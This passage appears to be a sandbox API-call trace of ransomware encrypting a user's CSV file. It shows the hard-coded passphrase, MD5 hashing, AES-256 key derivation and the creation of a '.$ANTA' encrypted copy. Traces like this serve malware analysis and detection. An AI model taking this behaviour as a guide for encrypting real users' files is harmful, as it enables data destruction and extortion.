[0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0081.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cadc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0081.693] CloseHandle (hObject=0x298) returned 1 [0081.693] FreeLibrary (hLibModule=0x772d0000) returned 1 [0081.693] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0081.693] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6080750, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0x6f5c28c0, ftLastAccessTime.dwHighDateTime=0x1d5ec05, ftLastWriteTime.dwLowDateTime=0x6f5c28c0, ftLastWriteTime.dwHighDateTime=0x1d5ec05, nFileSizeHigh=0x0, nFileSizeLow=0x16ee0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="hhInqxZ8uBmIDhBj07.csv", cAlternateFileName="HHINQX~1.CSV")) returned 0x41ac600 [0081.694] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0081.694] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0081.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0081.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0081.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0081.694] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a41d8) returned 1 [0081.695] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0081.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.695] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0081.695] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.695] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb420, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0081.696] CryptCreateHash (in: hProv=0x41a41d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.696] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.696] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.696] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c36c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0081.696] CryptHashData (hHash=0x41ac780, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0081.696] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.696] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.696] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3698, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0081.696] CryptDeriveKey (in: hProv=0x41a41d8, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac040) returned 1 [0081.697] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.697] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0081.697] CryptDestroyHash (hHash=0x41ac780) returned 1 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3aa0 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3ad0 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3950 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b18 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3980 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0081.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.698] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0081.698] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0081.698] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.698] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hhinqxz8ubmidhbj07.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0081.699] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.699] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0081.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0081.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0081.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.699] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0081.728] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0081.728] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0081.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a79b0 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a79b0 | out: hHeap=0x1780000) returned 1 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0081.730] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0081.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0081.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.730] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hhinqxz8ubmidhbj07.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.731] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0081.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.731] 